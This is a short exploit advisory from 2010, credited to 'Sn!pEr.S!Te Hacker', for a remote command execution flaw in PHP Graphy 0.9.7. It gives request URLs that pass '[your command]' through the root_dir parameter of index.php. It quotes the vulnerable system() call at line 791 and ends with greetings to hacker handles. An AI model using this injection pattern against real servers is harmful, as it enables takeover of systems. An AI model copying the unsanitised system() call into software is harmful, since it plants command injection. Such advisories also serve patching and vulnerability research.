# ----------------------oOO---(_)---OOo----------------------- 
# | __ __ |   
# | _____/ /_____ ______/ /_ __ ______ ______ |   
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |   
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |   
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |   
# | Security Sn!pEr.S!Te /____/ 2o1o |   
# ------------------------------------------------------------ 
     Remote Command Execution Vulnerability 
# ------------------------------------------------------------  
--------------------------------------------------------------
PHP Graphy <== 0.9.7 (index.php)

--------------------------------------------------------------
#[+] Author : Sn!pEr.S!Te Hacker #   
# [+] Email : sniper-site@HoTMaiL.coM #   
# [+] T34M Sn!pEr.S!Te Hacker #   
# [+] 24-5-2010 #  
# [+] Script : lmage »PHP Graphy# 
# [+] Download:http://sourceforge.net/projects/phpgraphy/files/phpgraphy/0.9.7/phpgraphy-0.9.7.tar.gz/download #  
# Version: [0.9.7] #

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=

Exploit : phpgraphy-0.9.7\index.php

http://localhost/phpgraphy-0.9.7/index.php?root_dir=[your command] 

http://127.0.0.1/phpgraphy-0.9.7/index.php?root_dir=[your command]


 system("cat \"".$root_dir.$display."_comment\"");

line : 791

web site Favorites my  : http://inj3ct0r.com/  & http://www.hack0wn.com/ & http://www.exploit-db.com

==================   Greetz : all my friend   ===================
* PrX Hacker * Sm Hacker * AbUbAdR * mAsH3L ALLiL * saleh Hacker * ALhal alsab |
* HitLer.3rb * QAHER ALRAFDE * DjHacker * Mr.JLD* Mr.koka |


 		 	   		  
_________________________________________________________________
Hotmail: بريد إلكتروني موثوق فيه ويتمتع بحماية قوية من البريد العشوائي.
https://signup.live.com/signup.aspx?id=60969